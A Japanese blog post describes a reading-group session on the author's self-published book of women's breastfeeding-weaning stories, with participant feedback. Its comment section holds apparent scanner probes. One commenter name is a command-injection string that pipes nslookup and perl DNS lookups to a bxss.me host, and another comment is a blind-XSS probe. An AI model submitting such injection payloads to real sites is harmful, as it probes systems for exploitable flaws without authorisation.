· 

魔法の質問読書会『乳本』

5月23日、

『魔法の質問読書会「乳本」』の集いを開催しました!

5組の参加でした。

 

土居がファシリテーター役をさせていただきました。

 

魔法の質問読書会。

事前に読む必要なく、しかもその場で読むのは5分だけ!という不思議な読書会です。

 

魔法の質問に答えて書き出して、みんなでシェア。

 

今回は3月に土居が自費出版した『HerstoryⅠ~31人の現代女性たちの歴史①卒乳断乳体験談~』を題材にさせていただきました。

 

ご自身の体験と同じような体験に目が行く方、

これから母乳卒業に向けての思いがある方、

過去の授乳の卒業体験の振り返りをしたい方、
私のこの本への思いをしっかり理解してくださっている(笑)方、

などなどのご参加。

 

質問とシェアを通して、

自分の思いを表出したり、

様々な視点をお互い知ることができたのではないかなと思います。

 

 

母乳やミルクの卒業だけでも、様々な背景や思いの元、親子それぞれ十人十色の体験があります。

卒業の体験談から、現代女性の人生について聞き取りまとめた本になります。

 

授乳だけでも色々な考え方があります。

たくさんの経験談を読むことで、正解なんてないこと、自分の生き方を再確認してもらえたら、との私自身の思いが、

参加者のみなさんに伝わっていて感無量でした!笑。

 

〇参加者さんの声〇

・自身が持てました。これからも学びや気づきで向上させていきたいです。

・質問すること、されることで、自分の心や他の心を聞けて良かった。

・みんなそれぞれ悩みがある。話をしてすっきり自分自身の振り返りになった。魔法の質問ワークシートが面白かった。

 

 

会の最後にはお1人に『ちちカード』をプレゼント!!!

引いていただいたカードはこちら。

みんなの前で宣言されていました笑!

 

 

今後乳本を使っての魔法の質問読書会は個人的にさせていただこうと思います。

ご参加いただいたみなさん、

ありがとうございました!

コメントをお書きください

コメント: 12
  • #1

    QPbmCRVM (月曜日, 16 8月 2021 21:51)

    1

  • #2

    QPbmCRVM (月曜日, 16 8月 2021 21:56)

    1

  • #3

    QPbmCRVM (月曜日, 16 8月 2021 21:57)

    1

  • #4

    QPbmCRVM (月曜日, 16 8月 2021 21:57)

    1

  • #5

    QPbmCRVM (月曜日, 16 8月 2021 21:57)

    /xfs.bxss.me

  • #6

    |(nslookup hitrzxznqfttof0070.bxss.me||perl -e "gethostbyname('hitrzxznqfttof0070.bxss.me')") (月曜日, 16 8月 2021 21:57)

    1

  • #7

    QPbmCRVM (月曜日, 16 8月 2021 21:57)

    1

  • #8

    QPbmCRVM (月曜日, 16 8月 2021 21:58)

    1

  • #9

    QPbmCRVM (月曜日, 16 8月 2021 21:58)

    1

  • #10

    QPbmCRVM (月曜日, 16 8月 2021 22:00)

    1

  • #11

    QPbmCRVM (月曜日, 16 8月 2021 22:00)

    1

  • #12

    QPbmCRVM (月曜日, 16 8月 2021 23:54)

    1